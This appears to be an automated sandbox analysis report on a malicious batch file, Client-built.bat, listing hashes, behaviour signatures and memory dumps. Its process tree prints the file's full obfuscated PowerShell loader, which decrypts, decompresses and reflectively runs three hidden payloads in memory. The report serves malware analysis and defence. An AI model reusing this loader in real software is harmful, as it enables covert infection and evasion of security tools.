a8346e637fd28aadcd48d79d071273c9c44cc50c097ce73d94c4896ad6d3641c

General

Target

Client-built.bat
Size

1.6MB
MD5

2628b8c09b80d3056859f2e1c0fbd0ee
SHA1

67221157d527a9b1fcaa500814d1902aeb8d4f25
SHA256

a8346e637fd28aadcd48d79d071273c9c44cc50c097ce73d94c4896ad6d3641c
SHA512

5fc2a757c6042a01228085d19d682946fc92a5bdd873c22cc45840b4455f17c0da564e19d353f17d5f37bedee92602d049c9d8f947a2e0937ff6e9ea2baae698
SSDEEP

24576:ODXucXYiqwKmvdwI/kxxhWPQwpX+6gMq30rI7Qr/1sbnGC7wKKQs0++X3sSmG0SY:ILXW0CIq6VQMrZC5gJZ7

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2456	powershell.exe
2456	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2456	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2456	powershell.exe
2456	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4892 wrote to memory of 4432	4892	cmd.exe	87
PID 4892 wrote to memory of 4432	4892	cmd.exe	87
PID 4892 wrote to memory of 2456	4892	cmd.exe	88
PID 4892 wrote to memory of 2456	4892	cmd.exe	88

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('WQC/L0yyTHTYOQkd7hDpbJbqiHHb3B2f2o/kDwWtVWk='); $aes_var.IV=[System.Convert]::FromBase64String('2paeSegtlD/+qG9BiSCyJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$mSnui=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$aikQE=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$QOBba=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($mSnui, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $QOBba.CopyTo($aikQE); $QOBba.Dispose(); $mSnui.Dispose(); $aikQE.Dispose(); $aikQE.ToArray();}function execute_function($param_var,$param2_var){ IEX '$PAbQa=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$gyqDL=$PAbQa.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$gyqDL.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$GmXDP = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $GmXDP;$HXzet=[System.IO.File]::ReadAllText($GmXDP).Split([Environment]::NewLine);foreach ($vQrFJ in $HXzet) { if ($vQrFJ.StartsWith('cLfQIMZgjAPIAwhKigcn')) { $AIkkT=$vQrFJ.Substring(20); break; }}$payloads_var=[string[]]$AIkkT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:4432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2456

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plx0s4e1.11a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2456-16-0x0000014B37A80000-0x0000014B37A88000-memory.dmp

Filesize
32KB

Download
memory/2456-18-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download
memory/2456-11-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download
memory/2456-12-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download
memory/2456-13-0x0000014B37AA0000-0x0000014B37AE4000-memory.dmp

Filesize
272KB

Download
memory/2456-14-0x0000014B37B70000-0x0000014B37BE6000-memory.dmp

Filesize
472KB

Download
memory/2456-1-0x0000014B375A0000-0x0000014B375C2000-memory.dmp

Filesize
136KB

Download
memory/2456-15-0x0000014B37A70000-0x0000014B37A78000-memory.dmp

Filesize
32KB

Download
memory/2456-17-0x0000014B37BF0000-0x0000014B37D32000-memory.dmp

Filesize
1.3MB

Download
memory/2456-0-0x00007FF87A7C3000-0x00007FF87A7C5000-memory.dmp

Filesize
8KB

Download
memory/2456-19-0x00007FF87A7C3000-0x00007FF87A7C5000-memory.dmp

Filesize
8KB

Download
memory/2456-20-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download
memory/2456-21-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download
memory/2456-23-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download
memory/2456-24-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download
memory/2456-27-0x00007FF87A7C0000-0x00007FF87B281000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing